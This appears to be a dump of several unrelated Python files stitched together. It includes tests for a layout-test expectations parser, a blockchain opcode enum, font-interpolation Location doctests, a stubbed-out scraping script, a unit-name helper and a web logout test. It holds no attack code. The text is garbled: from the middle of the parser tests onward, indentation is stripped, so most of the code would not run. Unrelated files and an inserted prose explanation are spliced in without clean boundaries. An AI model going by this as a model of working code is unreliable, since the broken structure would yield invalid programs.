        expectations = TestExpectations(test_port)

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])

        self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]""", actual_expectations)

    def test_remove_line_leaves_comments_for_next_line(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {'expectations': """
 # This comment line should not get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
        expectations = TestExpectations(test_port)

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])

        self.assertEqual("""
 # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)

    def test_remove_line_no_whitespace_lines(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {'expectations': """
 # This comment line should get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
 # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
        expectations = TestExpectations(test_port)

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])

        self.assertEqual(""" # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)

    def test_remove_first_line(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
 # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
        expectations = TestExpectations(test_port)

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])

        self.assertEqual(""" # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)

    def test_remove_flaky_line(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win ] failures/expected/foo.html [ Failure Timeout ]
Bug(y) [ Mac ] failures/expected/foo.html [ Crash ]
"""}
        expectations = TestExpectations(test_port)

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])

        self.assertEqual("""Bug(x) [ Win Debug ] failures/expected/foo.html [ Failure Timeout ]
Bug(y) [ Mac ] failures/expected/foo.html [ Crash ]
""", actual_expectations)


class RebaseliningTest(Base):
    def test_get_rebaselining_failures(self):
        # Make sure we find a test as needing a rebaseline even if it is not marked as a failure.
        self.parse_exp('Bug(x) failures/expected/text.html [ Rebaseline ]\n')
        self.assertEqual(len(self._exp.get_rebaselining_failures()), 1)

        self.parse_exp(self.get_basic_expectations())
        self.assertEqual(len(self._exp.get_rebaselining_failures()), 0)


class TestExpectationsParserTests(unittest.TestCase):
    def __init__(self, testFunc):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        self._converter = TestConfigurationConverter(test_port.all_test_configurations(), test_port.configuration_specifier_macros())
        unittest.TestCase.__init__(self, testFunc)
        self._parser = TestExpectationParser(host.port_factory.get('test-win-xp', None), [], is_lint_mode=False)

    def test_expectation_line_for_test(self):
        # This is kind of a silly test, but it at least ensures that we don't throw an error.
        test_name = 'foo/test.html'
        expectations = set(["PASS", "IMAGE"])

        expectation_line = TestExpectationLine()
        expectation_line.original_string = test_name
        expectation_line.name = test_name
        expectation_line.filename = '<Bot TestExpectations>'
        expectation_line.line_numbers = '0'
        expectation_line.expectations = expectations
        self._parser._parse_line(expectation_line)

        self.assertEqual(self._parser.expectation_line_for_test(test_name, expectations), expectation_line)


class TestExpectationSerializationTests(unittest.TestCase):
    def __init__(self, testFunc):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        self._converter = TestConfigurationConverter(test_port.all_test_configurations(), test_port.configuration_specifier_macros())
        unittest.TestCase.__init__(self, testFunc)

    def _tokenize(self, line):
        return TestExpectationParser._tokenize_line('path', line, 0)

    def assert_round_trip(self, in_string, expected_string=None):
        expectation = self._tokenize(in_string)
        if expected_string is None:
            expected_string = in_string
        self.assertEqual(expected_string, expectation.to_string(self._converter))

    def assert_list_round_trip(self, in_string, expected_string=None):
        host = MockHost()
        parser = TestExpectationParser(host.port_factory.get('test-win-xp', None), [], is_lint_mode=False)
        expectations = parser.parse('path', in_string)
        if expected_string is None:
            expected_string = in_string
        self.assertEqual(expected_string, TestExpectations.list_to_string(expectations, self._converter))

    def test_unparsed_to_string(self):
        expectation = TestExpectationLine()

        self.assertEqual(expectation.to_string(self._converter), '')
        expectation.comment = ' Qux.'
        self.assertEqual(expectation.to_string(self._converter), '# Qux.')
        expectation.name = 'bar'
        self.assertEqual(expectation.to_string(self._converter), 'bar # Qux.')
        expectation.specifiers = ['foo']
        # FIXME: case should be preserved here but we can't until we drop the old syntax.
        self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar # Qux.')
        expectation.expectations = ['bAz']
        self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ ] # Qux.')
        expectation.expectations = ['bAz1', 'baZ2']
        self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ1 BAZ2 ] # Qux.')
        expectation.specifiers = ['foo1', 'foO2']
        self.assertEqual(expectation.to_string(self._converter), '[ FOO1 FOO2 ] bar [ BAZ1 BAZ2 ] # Qux.')
        expectation.warnings.append('Oh the horror.')
        self.assertEqual(expectation.to_string(self._converter), '')
        expectation.original_string = 'Yes it is!'
        self.assertEqual(expectation.to_string(self._converter), 'Yes it is!')

    def test_unparsed_list_to_string(self):
        expectation = TestExpectationLine()
        expectation.comment = 'Qux.'
        expectation.name = 'bar'
expectation.specifiers = ['foo']
expectation.expectations = ['bAz1', 'baZ2']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(TestExpectations.list_to_string([expectation]), '[ FOO ] bar [ BAZ1 BAZ2 ] #Qux.')
def test_parsed_to_string(self):
expectation_line = TestExpectationLine()
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'test/name/for/realz.html'
expectation_line.parsed_expectations = set([IMAGE])
self.assertEqual(expectation_line.to_string(self._converter), None)
expectation_line.matching_configurations = set([TestConfiguration('xp', 'x86', 'release')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ XP Release ] test/name/for/realz.html [ ImageOnlyFailure ]')
expectation_line.matching_configurations = set([TestConfiguration('xp', 'x86', 'release'), TestConfiguration('xp', 'x86', 'debug')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ XP ] test/name/for/realz.html [ ImageOnlyFailure ]')
def test_serialize_parsed_expectations(self):
expectation_line = TestExpectationLine()
expectation_line.parsed_expectations = set([])
parsed_expectation_to_string = dict([[parsed_expectation, expectation_string] for expectation_string, parsed_expectation in TestExpectations.EXPECTATIONS.items()])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), '')
expectation_line.parsed_expectations = set([FAIL])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'fail')
expectation_line.parsed_expectations = set([PASS, IMAGE])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'image pass')
expectation_line.parsed_expectations = set([FAIL, PASS])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'pass fail')
def test_serialize_parsed_specifier_string(self):
expectation_line = TestExpectationLine()
expectation_line.bugs = ['garden-o-matic']
expectation_line.parsed_specifiers = ['the', 'for']
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, []), 'for the')
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, ['win']), 'for the win')
expectation_line.bugs = []
expectation_line.parsed_specifiers = []
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, []), '')
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, ['win']), 'win')
def test_format_line(self):
self.assertEqual(TestExpectationLine._format_line([], ['MODIFIERS'], 'name', ['EXPECTATIONS'], 'comment'), '[ MODIFIERS ] name [ EXPECTATIONS ] #comment')
self.assertEqual(TestExpectationLine._format_line([], ['MODIFIERS'], 'name', ['EXPECTATIONS'], None), '[ MODIFIERS ] name [ EXPECTATIONS ]')
def test_string_roundtrip(self):
self.assert_round_trip('')
self.assert_round_trip('[')
self.assert_round_trip('FOO [')
self.assert_round_trip('FOO ] bar')
self.assert_round_trip(' FOO [')
self.assert_round_trip(' [ FOO ] ')
self.assert_round_trip('[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] ] ] bar BAZ')
self.assert_round_trip('[ FOO ] ] ] bar [ BAZ ]')
self.assert_round_trip('FOO ] ] bar ==== BAZ')
self.assert_round_trip('=')
self.assert_round_trip('#')
self.assert_round_trip('# ')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo :')
self.assert_round_trip('# Foo : =')
def test_list_roundtrip(self):
self.assert_list_round_trip('')
self.assert_list_round_trip('\n')
self.assert_list_round_trip('\n\n')
self.assert_list_round_trip('bar')
self.assert_list_round_trip('bar\n# Qux.')
self.assert_list_round_trip('bar\n# Qux.\n')
def test_reconstitute_only_these(self):
lines = []
reconstitute_only_these = []
def add_line(matching_configurations, reconstitute):
expectation_line = TestExpectationLine()
expectation_line.original_string = "Nay"
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'Yay'
expectation_line.parsed_expectations = set([IMAGE])
expectation_line.matching_configurations = matching_configurations
lines.append(expectation_line)
if reconstitute:
reconstitute_only_these.append(expectation_line)
add_line(set([TestConfiguration('xp', 'x86', 'release')]), True)
add_line(set([TestConfiguration('xp', 'x86', 'release'), TestConfiguration('xp', 'x86', 'debug')]), False)
serialized = TestExpectations.list_to_string(lines, self._converter)
self.assertEqual(serialized, "Bug(x) [ XP Release ] Yay [ ImageOnlyFailure ]\nBug(x) [ XP ] Yay [ ImageOnlyFailure ]")
serialized = TestExpectations.list_to_string(lines, self._converter, reconstitute_only_these=reconstitute_only_these)
self.assertEqual(serialized, "Bug(x) [ XP Release ] Yay [ ImageOnlyFailure ]\nNay")
def disabled_test_string_whitespace_stripping(self):
# FIXME: Re-enable this test once we rework the code to no longer support the old syntax.
self.assert_round_trip('\n', '')
self.assert_round_trip(' [ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
# src/types/condition_opcodes.py (altendky/chia-blockchain, Apache-2.0)
import enum
class ConditionOpcode(bytes, enum.Enum):
UNKNOWN = bytes([49])
AGG_SIG = bytes([50])
CREATE_COIN = bytes([51])
ASSERT_COIN_CONSUMED = bytes([52])
ASSERT_MY_COIN_ID = bytes([53])
ASSERT_TIME_EXCEEDS = bytes([54])
ASSERT_BLOCK_INDEX_EXCEEDS = bytes([55])
ASSERT_BLOCK_AGE_EXCEEDS = bytes([56])
AGG_SIG_ME = bytes([57])
ASSERT_FEE = bytes([58])
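Because `ConditionOpcode` mixes `bytes` into `enum.Enum`, every member is itself a `bytes` object. A minimal self-contained sketch (mirroring two of the members above, with a shortened class name) of how that behaves:

```python
import enum

# Mirrors two members of the ConditionOpcode enum above to show the
# behaviour of a bytes-backed Enum.
class Opcode(bytes, enum.Enum):
    AGG_SIG = bytes([50])
    CREATE_COIN = bytes([51])

# Each member is a real bytes instance, so it compares equal to raw wire data.
assert Opcode.CREATE_COIN == bytes([51])

# Value lookup maps a raw byte string back to the named opcode.
op = Opcode(bytes([51]))
assert op is Opcode.CREATE_COIN
assert op.name == "CREATE_COIN"
```

This is why the opcodes can be matched directly against bytes pulled out of a serialized program without an explicit decoding step.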
# Lib/mutatorMath/test/objects/location.py (kishorkunal-raj/MutatorMath, BSD-3-Clause)
from mutatorMath.objects.location import Location, biasFromLocations, sortLocations
def _testBiasFromLocations(bias, locs):
"""
# Find the designspace vector for the best bias.
# Test results: (<number of on-axis locations>, <number of off-axis locations>)
>>> locs = [Location(a=10), Location(a=10, b=10, c=10), Location(a=10, c=15), Location(a=5, c=15)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location a:10, c:15 >
>>> _testBiasFromLocations(bias, locs)
(2, 1)
>>> locs = [Location(a=10, b=0), Location(a=5, b=10), Location(a=20, b=0)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location a:10, b:0 >
>>> _testBiasFromLocations(bias, locs)
(1, 1)
>>> locs = [Location(a=10, b=300), Location(a=20, b=300), Location(a=20, b=600), Location(a=30, b=300)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location a:20, b:300 >
>>> _testBiasFromLocations(bias, locs)
(3, 0)
>>> locs = [Location(a=-10, b=300), Location(a=0, b=400), Location(a=20, b=300)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location a:-10, b:300 >
>>> _testBiasFromLocations(bias, locs)
(1, 1)
>>> locs = [Location(wt=0, wd=500),
... Location(wt=1000, wd=900),
... Location(wt=1200, wd=900),
... Location(wt=-200, wd=600),
... Location(wt=0, wd=600),
... Location(wt=1000, wd=600),
... Location(wt=1200, wd=600),
... Location(wt=-200, wd=300),
... Location(wt=0, wd=300),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location wd:600, wt:0 >
>>> _testBiasFromLocations(bias, locs)
(5, 3)
>>> locs = [
... Location(wt=1, sz=0),
... Location(wt=0, sz=0),
... Location(wt=0.275, sz=0),
... Location(wt=0.275, sz=1),
... Location(wt=1, sz=1),
... Location(wt=0.125, sz=0.4),
... Location(wt=1, sz=0.4),
... Location(wt=0.6, sz=0.4),
... Location(wt=0, sz=0.4),
... Location(wt=0.275, sz=0.4),
... Location(wt=0, sz=1),
... Location(wt=0.125, sz=1),
... Location(wt=0.6, sz=0),
... Location(wt=0.125, sz=0),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location sz:0, wt:0 >
>>> _testBiasFromLocations(bias, locs)
(6, 7)
# Nothing lines up
>>> locs = [
... Location(pop=1),
... Location(snap=1),
... Location(crackle=1)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location crackle:1 >
>>> _testBiasFromLocations(bias, locs)
(0, 2)
# ... why crackle? because it sorts first
>>> locs.sort()
>>> locs
[<Location crackle:1 >, <Location pop:1 >, <Location snap:1 >]
# Two things line up
>>> locs = [
... Location(pop=-1),
... Location(pop=1),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location pop:-1 >
>>> _testBiasFromLocations(bias, locs)
(1, 0)
# Two things line up
>>> locs = [
... Location(pop=-1, snap=-1),
... Location(pop=1, snap=0),
... Location(pop=1, snap=1),
... Location(pop=1, snap=1),
... ]
>>> bias = biasFromLocations(locs)
>>> bias
<Location pop:1, snap:1 >
>>> _testBiasFromLocations(bias, locs)
(2, 1)
# Almost Nothing Lines Up 1
# An incomplete set of masters can
# create a situation in which there is nothing to interpolate.
# However, we still need to find a bias.
>>> locs = [
... Location(wt=1, sz=0.4),
... Location(wt=0.275, sz=0.4),
... Location(wt=0, sz=1),
... Location(wt=0.125, sz=0),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location sz:0.400, wt:0.275 >
>>> _testBiasFromLocations(bias, locs)
(1, 2)
# Almost Nothing Lines Up 2
>>> locs = [
... Location(wt=1, sz=0.4),
... Location(wt=0.275, sz=0.4),
... Location(wt=0, sz=1),
... Location(wt=0.6, sz=1),
... Location(wt=0.125, sz=0),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location sz:0.400, wt:0.275 >
>>> _testBiasFromLocations(bias, locs)
(1, 3)
# A square on the origin
>>> locs = [
... Location(wt=0, wd=0),
... Location(wt=1, wd=0),
... Location(wt=0, wd=1),
... Location(wt=1, wd=1),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location wd:0, wt:0 >
>>> _testBiasFromLocations(bias, locs)
(2, 1)
# A square, not on the origin
>>> locs = [
... Location(wt=100, wd=100),
... Location(wt=200, wd=100),
... Location(wt=100, wd=200),
... Location(wt=200, wd=200),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location wd:100, wt:100 >
>>> _testBiasFromLocations(bias, locs)
(2, 1)
# A square, not on the origin
>>> locs = [
... Location(wt=200, wd=100),
... Location(wt=100, wd=200),
... Location(wt=200, wd=200),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location wd:200, wt:200 >
>>> _testBiasFromLocations(bias, locs)
(2, 0)
# Two axes, three masters
>>> locs = [
... Location(ct=0, wd=0),
... Location(ct=0, wd=1000),
... Location(ct=100, wd=1000),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location ct:0, wd:1000 >
>>> _testBiasFromLocations(bias, locs)
(2, 0)
# Complex 4 D space
>>> locs = [
... Location(A=0, H=0, G=1000, W=0),
... Location(A=0, H=0, G=1000, W=700),
... Location(A=0, H=0, G=1000, W=1000),
... Location(A=0, H=1000, G=0, W=200),
... Location(A=0, H=1000, G=0, W=300),
... Location(A=0, H=1000, G=0, W=700),
... Location(A=0, H=1000, G=0, W=1000),
... Location(A=1000, H=0, G=0, W=0),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location A:0, G:0, H:1000, W:200 >
>>> locs = [
... Location(S=0, U=0, Wt=54, Wd=385),
... Location(S=0, U=268, Wt=54, Wd=1000),
... Location(S=8, U=550, Wt=851, Wd=126),
... Location(S=8, U=868, Wt=1000, Wd=1000),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location S:0, U:268, Wd:1000, Wt:54 >
# empty locs
>>> locs = []
>>> bias = biasFromLocations(locs)
>>> bias
<Location origin >
"""
rel = []
# translate the test locations over the bias
for l in locs:
rel.append((l - bias).isOnAxis())
# MUST have one origin
assert None in rel
# how many end up off-axis?
offAxis = rel.count(False)
# how many end up on-axis?
onAxis = len(rel)-offAxis-1
# a good bias has more masters at on-axis locations.
return onAxis, offAxis
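The tri-state bookkeeping above can be sketched with plain values: `isOnAxis()` returns `None` for the origin, an axis name string for an on-axis location, and `False` for an off-axis one. The sample `rel` list here is hypothetical, standing in for the relocated locations:

```python
# Hypothetical isOnAxis() results for five relocated locations:
# one origin (None), two on-axis (axis names), two off-axis (False).
rel = [None, "a", "b", False, False]

off_axis = rel.count(False)          # locations that moved off every axis
on_axis = len(rel) - off_axis - 1    # everything else, minus the one origin

assert (on_axis, off_axis) == (2, 2)
```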
def test_common():
""" Make a new location with only the dimensions that the two have in common.
>>> a = Location(pop=.25, snap=.5, snip=10)
>>> b = Location(pop=-.35, snap=.6, pip=10)
>>> [n.asTuple() for n in a.common(b)]
[(('pop', 0.25), ('snap', 0.5)), (('pop', -0.35), ('snap', 0.6))]
"""
def test_misc():
"""
>>> l = Location(apop=-1, bpop=10, cpop=-100)
>>> l.isOnAxis()
False
# remove empty dimensions
>>> a = Location(pop=.25, snap=1, plop=0)
>>> a.strip().asTuple()
(('pop', 0.25), ('snap', 1))
# add dimensions, set to 0
>>> a = Location(pop=.25, snap=1)
>>> a.expand(['plop', 'flop'])
>>> a.asTuple()
(('flop', 0), ('plop', 0), ('pop', 0.25), ('snap', 1))
# create a location from a list of name / value tuples.
>>> a = Location()
>>> t = [('weight', 1), ('width', 2), ('zip', 3)]
>>> a.fromTuple(t)
>>> a
<Location weight:1, width:2, zip:3 >
"""
def test_onAxis():
"""
# origin will return None
>>> l = Location(pop=0, aap=0, lalala=0, poop=0)
>>> l.isOnAxis()
# on axis will return axis name
>>> l = Location(pop=0, aap=1, lalala=0, poop=0)
>>> l.isOnAxis()
'aap'
# off axis will return False
>>> l = Location(pop=0, aap=1, lalala=1, poop=0)
>>> l.isOnAxis()
False
"""
def test_distance():
"""
# Hypotenuse distance between two locations.
>>> a = Location(pop=0, snap=0)
>>> b = Location(pop=100, snap=0)
>>> a.distance(b)
100.0
>>> a = Location(pop=0, snap=3)
>>> b = Location(pop=4, snap=0)
>>> a.distance(b)
5.0
>>> a = Location()
>>> b = Location(pop=3, snap=4)
>>> a.distance(b)
5.0
"""
def test_limits_sorts():
""" Test some of the functions that handle Locations.
# get the extent of a group of locations.
>>> a = Location(pop=.25, snap=1, plop=0)
>>> b = Location(pop=-1, aap=10)
>>> c = Location(pop=.25, snap=.5)
>>> d = Location(pop=.35, snap=1)
>>> e = Location(pop=1)
>>> f = Location(snap=1)
>>> l = [a, b, c, d, e, f]
>>> test = Location(pop=.5, snap=.5)
>>> from mutatorMath.objects.mutator import getLimits
>>> limits = getLimits(l, test)
>>> 'snap' in limits and 'pop' in limits
True
>>> limits['snap']
(None, 0.5, None)
>>> limits['pop']
(0.35, None, 1)
# sort a group of locations
>>> sortLocations(l)
([<Location pop:1 >, <Location snap:1 >], [<Location plop:0, pop:0.250, snap:1 >, <Location pop:0.350, snap:1 >], [<Location aap:10, pop:-1 >, <Location pop:0.250, snap:0.500 >])
>>> a1, a2, a3 = sortLocations(l)
# assert that each location in a1 is on axis,
>>> sum([a.isOnAxis() is not None and a.isOnAxis() is not False for a in a1])
2
# assert that each location in a1 is off axis,
>>> sum([a.isOnAxis() is False for a in a2])
2
# how to test for wild locations? Can only see if they're offAxis. Relevant?
>>> sum([a.isOnAxis() is False for a in a3])
2
"""
def test_ambivalence():
""" Test ambivalence qualities of locations.
>>> a = Location(pop=(.25, .33), snap=1, plop=0)
>>> b = Location(pop=.25, snap=1, plop=0)
>>> a.isAmbivalent()
True
>>> b.isAmbivalent()
False
>>> a.spliceX().asTuple() == (('plop', 0), ('pop', 0.25), ('snap', 1))
True
>>> a.spliceY().asTuple() == (('plop', 0), ('pop', 0.33), ('snap', 1))
True
>>> b.spliceX() == b.spliceY()
True
>>> a = Location(pop=(.25, .33), snap=1, plop=0)
>>> a * 2
<Location plop:0, pop:(0.500,0.660), snap:2 >
>>> a * (2,0)
<Location plop:(0.000,0.000), pop:(0.500,0.000), snap:(2.000,0.000) >
"""
def test_asString():
""" Test the conversions to string.
>>> a = Location(pop=(.25, .33), snap=1.0, plop=0)
>>> assert a.asString(strict=False) == "plop:0, pop:(0.250,0.330), snap:1"
>>> assert a.asString(strict=True) == "plop:0, pop:(0.250,0.330), snap:1"
>>> a = Location(pop=0)
>>> assert a.asString() == "pop:0"
>>> assert a.asString(strict=True) == "pop:0"
>>> a = Location(pop=-1, sip=1)
>>> assert a.asString() == "pop:-1, sip:1"
>>> assert a.asString(strict=True) == "pop:-1, sip:1"
>>> a = Location()
>>> assert a.asString() == "origin"
# more string conversions
>>> a = Location(pop=1)
>>> assert a.asSortedStringDict() == [{'value': '1', 'axis': 'pop'}]
>>> a = Location(pop=(0,1))
>>> assert a.asSortedStringDict() == [{'value': '(0,1)', 'axis': 'pop'}]
# a description of the type of location
>>> assert Location(a=1, b=0, c=0).getType() == "on-axis, a"
>>> assert Location(a=1, b=2).getType() == "off-axis, a b"
>>> assert Location(a=1).getType() == "on-axis, a"
>>> assert Location(a=(1,1), b=2).getType() == "off-axis, a b, split"
>>> assert Location().getType() == "origin"
"""
def test_comparisons():
""" Test the math comparison qualities.
The equal operator is useful.
The < and > operators make assumptions about the geometry that might not be appropriate.
>>> a = Location()
>>> a.isOrigin()
True
>>> b = Location(pop=2)
>>> c = Location(pop=2)
>>> b.distance(a)
2.0
>>> a.distance(b)
2.0
>>> assert (a>b) == False
>>> assert (c<b) == False
>>> assert (c==b) == True
"""
def test_sorting():
""" Test the sorting qualities.
>>> a = Location(pop=0)
>>> b = Location(pop=1)
>>> c = Location(pop=2)
>>> d = Location(pop=-1)
>>> l = [b, d, a, c]
>>> l.sort()
>>> l
[<Location pop:-1 >, <Location pop:0 >, <Location pop:1 >, <Location pop:2 >]
>>> e = Location(pop=1, snap=1)
>>> l = [a, e]
>>> l.sort()
>>> l
[<Location pop:0 >, <Location pop:1, snap:1 >]
>>> f = Location(pop=-1, snap=-1)
>>> l = [a, e, f]
>>> l.sort()
>>> l
[<Location pop:0 >, <Location pop:-1, snap:-1 >, <Location pop:1, snap:1 >]
>>> l = [Location(pop=-1), Location(pop=1)]
>>> l.sort()
>>> l
[<Location pop:-1 >, <Location pop:1 >]
"""
def test_basicMath():
""" Test the basic mathematical properties of Location.
# addition
>>> Location(a=1) + Location(a=2) == Location(a=3)
True
# addition of ambivalent location
>>> Location(a=1) + Location(a=(2, 1)) == Location(a=(3,2))
True
# subtraction
>>> Location(a=2) - Location(a=1) == Location(a=1)
True
# subtraction of ambivalent location
>>> Location(a=1) - Location(a=(2, 1)) == Location(a=(-1,0))
True
>>> Location(a=(1,4)) - Location(a=(2, 1)) == Location(a=(-1,3))
True
>>> Location(a=(2,1)) - Location(a=(2, 1)) == Location(a=0)
True
# multiplication
>>> Location(a=3) * 3 == Location(a=9)
True
# multiplication of ambivalent location
>>> Location(a=(2, 1)) * 3 == Location(a=(6,3))
True
# division
>>> Location(a=10) / 2 == Location(a=5)
True
>>> Location(a=10, b=6) / 2 == Location(a=5, b=3)
True
# should raise zero division error
>>> hasRaisedError = False
>>> try:
... Location(a=5) / 0
... except ZeroDivisionError:
... hasRaisedError = True
>>> assert hasRaisedError
# interpolation
>>> a = Location(a=(100, 200))
>>> b = Location(a=(0, 0))
>>> f = 0
>>> a+f*(b-a) == Location(a=(100,200))
True
>>> f = 0.5
>>> a+f*(b-a) == Location(a=(50,100))
True
>>> f = 1
>>> a+f*(b-a) == Location(a=0)
True
"""
def test17():
""" See if getLimits can deal with ambiguous locations.
>>> a = Location(pop=(0.25, 4), snap=1, plop=0)
>>> print(a.split())
(<Location plop:0, pop:0.250, snap:1 >, <Location plop:0, pop:4, snap:1 >)
"""
def regressionTests():
""" Test all the basic math operations
>>> assert Location(a=1) + Location(a=2) == Location(a=3) # addition
>>> assert Location(a=1.0) - Location(a=2.0) == Location(a=-1.0) # subtraction
>>> assert Location(a=1.0) * 2 == Location(a=2.0) # multiplication
>>> assert Location(a=1.0) * 0 == Location(a=0.0) # multiplication
>>> assert Location(a=2.0) / 2 == Location(a=1.0) # division
>>> assert Location(a=(1,2)) * 2 == Location(a=(2,4)) # multiplication with ambivalence
>>> assert Location(a=(2,4)) / 2 == Location(a=(1,2)) # division with ambivalence
>>> assert Location(a=(2,4)) - Location(a=1) == Location(a=(1,3))
"""
if __name__ == '__main__':
import sys
import doctest
sys.exit(doctest.testmod().failed)
# Whoosh/pruebas.py (josperdom1/AII, MIT)
from whoosh.index import create_in, open_dir
from whoosh.fields import *
from whoosh.qparser import QueryParser
from tkinter import messagebox
from tkinter import *
from bs4 import BeautifulSoup
from datetime import datetime
import urllib.request
import locale
import os
locale.setlocale(locale.LC_ALL, 'es_ES.UTF-8')
def extract_events():
    # Function body is missing in the source; stub added so the module parses.
    pass

print(extract_events())
# pyleecan/Methods/GUI_Option/Unit/get_m2_name.py (IrakozeFD/pyleecan, Apache-2.0)
# -*- coding: utf-8 -*-
def get_m2_name(self):
"""Return the name of the current area unit
Parameters
----------
self : Unit
A Unit object
Returns
-------
unit_name : str
Name of the current unit
"""
if self.unit_m2 == 1:
return "mm²"
else:
return "m²"
# Web-App/qa327_test/frontend/test_R7_logout.py (sgravel129/SeetGeeks, MIT)
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User
from werkzeug.security import generate_password_hash, check_password_hash
# Mock a sample user
test_user = User(
email='test_frontend@test.com',
name='test_frontend',
password='test_frontend'
)
class FrontEndLogoutTest(BaseCase):
@patch('qa327.backend.get_user', return_value=test_user)
def test_login_success(self, *_):
# remove any current sessions
self.open(base_url + '/logout')
# create a session
self.open(base_url + '/login')
self.type("#email", test_user.email)
self.type("#password", test_user.password)
self.click('input[type="submit"]')
# logout of session
self.open(base_url + '/logout')
# verify that we have closed session/logged out
# open root url, this should redirect to login
self.open(base_url + '/')
self.assert_text("Please login", "#message")
# open root buy page, this should redirect to login
self.open(base_url + '/buy')
self.assert_text("Please login", "#message")
# open root sell page, this should redirect to login
self.open(base_url + '/sell')
self.assert_text("Please login", "#message")
# open root update page, this should redirect to login
self.open(base_url + '/update')
self.assert_text("Please login", "#message")
